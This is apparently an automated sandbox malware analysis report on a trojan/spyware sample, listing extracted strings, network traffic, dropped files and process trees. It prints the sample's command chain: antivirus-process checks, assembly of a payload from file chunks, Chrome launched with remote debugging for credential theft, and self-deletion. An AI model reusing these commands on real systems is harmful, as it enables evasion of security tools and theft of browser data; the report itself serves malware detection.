Source: chrome.exe, 00000011.00000003.2118874072.000001E000F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000011.00000003.2121366236.000001E00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121056766.000001E0003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121193500.000001E001158000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chromecache_87.19.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_84.19.dr	String found in binary or memory: https://plus.google.com
Source: chromecache_84.19.dr	String found in binary or memory: https://plus.googleapis.com
Source: chrome.exe, 00000011.00000003.2118874072.000001E000F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000011.00000003.2139564446.000001E0014A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000011.00000003.2150434077.000001E000B64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2139564446.000001E0014A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000011.00000003.2150434077.000001E000B64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2139564446.000001E0014A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000011.00000003.2150434077.000001E000B64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2139564446.000001E0014A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000011.00000003.2139564446.000001E0014A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000011.00000003.2139564446.000001E0014A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000011.00000003.2139564446.000001E0014A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 00000011.00000003.2133265836.000001E000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000011.00000003.2135649140.000001E001374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135972980.000001E00142C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135907408.000001E001424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2139166713.000001E001374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135732129.000001E001374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2139196653.000001E001458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2139142043.000001E0012D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135840351.000001E00141C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: phlnoh.12.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: phlnoh.12.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: phlnoh.12.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: phlnoh.12.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: chromecache_84.19.dr	String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: f379r9.12.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: Bound.8.dr, Red.com.1.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: im7gdj.12.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RisingStrip.exe	String found in binary or memory: https://www.entrust.net/rpa0
Source: f379r9.12.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: Red.com.1.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: chrome.exe, 00000011.00000003.2133265836.000001E000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 00000011.00000003.2133265836.000001E000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000011.00000003.2133265836.000001E000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000011.00000003.2117807265.000001E000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2117840498.000001E000CD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000011.00000003.2139564446.000001E0014A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 00000011.00000003.2139564446.000001E0014A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: im7gdj.12.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000011.00000003.2135649140.000001E001374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135972980.000001E00142C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135907408.000001E001424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2139166713.000001E001374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135732129.000001E001374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135793599.000001E0010D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2139196653.000001E001458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2139142043.000001E0012D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135840351.000001E00141C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 00000011.00000003.2135840351.000001E00141C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000011.00000003.2139564446.000001E0014A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000011.00000003.2121193500.000001E001158000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000011.00000003.2133265836.000001E000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 00000011.00000003.2139564446.000001E0014A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chromecache_84.19.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_84.19.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chrome.exe, 00000011.00000003.2143397323.000001E001764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2143033844.000001E001734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2143428285.000001E001768000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2143167947.000001E001740000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2143366480.000001E001760000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2143228113.000001E001744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2143297708.000001E001758000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2143072956.000001E001738000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2143329635.000001E00175C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2143264697.000001E001754000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2143113292.000001E00173C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 00000011.00000003.2139564446.000001E0014A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000011.00000003.2139564446.000001E0014A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000011.00000003.2133265836.000001E000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 00000011.00000003.2133265836.000001E000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chromecache_87.19.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_87.19.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_87.19.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: chrome.exe, 00000011.00000003.2139142043.000001E0012D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000011.00000003.2135649140.000001E001374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2138106629.000001E0013D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2139166713.000001E001374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135732129.000001E001374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2138792808.000001E0013A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2139196653.000001E001458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2139142043.000001E0012D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000011.00000003.2139142043.000001E0012D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135840351.000001E00141C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000011.00000003.2139142043.000001E0012D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135840351.000001E00141C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.13.109:443 -> 192.168.2.4:49740 version: TLS 1.2

Source: C:\Users\user\Desktop\RisingStrip.exe

Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050CD

Source: C:\Users\user\Desktop\RisingStrip.exe

Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044A5

Source: C:\Users\user\Desktop\RisingStrip.exe

Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,

0_2_00403883

Source: C:\Users\user\Desktop\RisingStrip.exe	File created: C:\Windows\JackieMinimal	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	File created: C:\Windows\ConstraintFrederick	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	File created: C:\Windows\TriviaTheories	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	File created: C:\Windows\FunctionsFisheries	Jump to behavior

Source: C:\Users\user\Desktop\RisingStrip.exe	Code function: 0_2_0040497C	0_2_0040497C
Source: C:\Users\user\Desktop\RisingStrip.exe	Code function: 0_2_00406ED2	0_2_00406ED2
Source: C:\Users\user\Desktop\RisingStrip.exe	Code function: 0_2_004074BB	0_2_004074BB

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\Desktop\RisingStrip.exe

Code function: String function: 004062A3 appears 58 times

Source: RisingStrip.exe

Static PE information: invalid certificate

Source: RisingStrip.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@47/47@9/8

Source: C:\Users\user\Desktop\RisingStrip.exe

0_2_004044A5

Source: C:\Users\user\Desktop\RisingStrip.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\Desktop\RisingStrip.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Phentermine

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03

Source: C:\Users\user\Desktop\RisingStrip.exe

File created: C:\Users\user\AppData\Local\Temp\nsm81F6.tmp

Jump to behavior

Source: RisingStrip.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\RisingStrip.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\RisingStrip.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 7q16x4790.12.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: RisingStrip.exe	Virustotal: Detection: 26%
Source: RisingStrip.exe	ReversingLabs: Detection: 13%

Source: C:\Users\user\Desktop\RisingStrip.exe

File read: C:\Users\user\Desktop\RisingStrip.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\RisingStrip.exe "C:\Users\user\Desktop\RisingStrip.exe"
Source: C:\Users\user\Desktop\RisingStrip.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Vids Vids.cmd & Vids.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 91531
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Shepherd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "copyrighted" Tell
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 91531\Red.com + Certificates + Mountain + Hydraulic + Advances + Am + Belongs + Housing + Viral + Bound 91531\Red.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Generated + ..\Er + ..\Soma + ..\Sponsors + ..\Identifies + ..\Phentermine + ..\Applying + ..\October q
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com Red.com q
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2184,i,6651775337915312218,4819002569926656069,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com" & rd /s /q "C:\ProgramData\y5xtj" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\RisingStrip.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Vids Vids.cmd & Vids.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 91531	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Shepherd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "copyrighted" Tell	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 91531\Red.com + Certificates + Mountain + Hydraulic + Advances + Am + Belongs + Housing + Viral + Bound 91531\Red.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Generated + ..\Er + ..\Soma + ..\Sponsors + ..\Identifies + ..\Phentermine + ..\Applying + ..\October q	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com Red.com q	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com" & rd /s /q "C:\ProgramData\y5xtj" & exit	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2184,i,6651775337915312218,4819002569926656069,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\RisingStrip.exe	Section loaded: coreuicomponents.dll	Jump to behavior
